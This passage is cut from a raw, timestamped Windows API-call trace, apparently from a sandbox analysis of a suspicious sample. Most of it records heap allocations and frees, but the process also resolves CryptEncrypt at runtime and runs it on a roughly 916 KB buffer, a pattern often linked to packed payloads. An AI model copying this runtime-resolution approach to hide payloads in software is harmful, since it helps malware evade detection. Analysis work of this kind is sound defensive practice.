wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0161.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.759] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.759] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.759] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.759] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0161.760] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3ea0020 | out: hHeap=0x25c0000) returned 1 [0161.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0161.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa700, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0161.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.775] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0161.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3c18 [0161.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0161.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0161.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0161.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0161.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0161.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0161.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0161.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0161.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0161.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0161.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0161.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0161.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.776] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xdfd0d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xdfd10) returned 1 [0161.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0161.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0161.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0161.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0161.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0161.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0161.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0161.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0161.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0161.779] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0161.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.781] CharLowerBuffW (in: lpsz="byte[916752]", cchLength=0xc | out: lpsz="byte[916752]") returned 0xc [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0161.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0161.781] 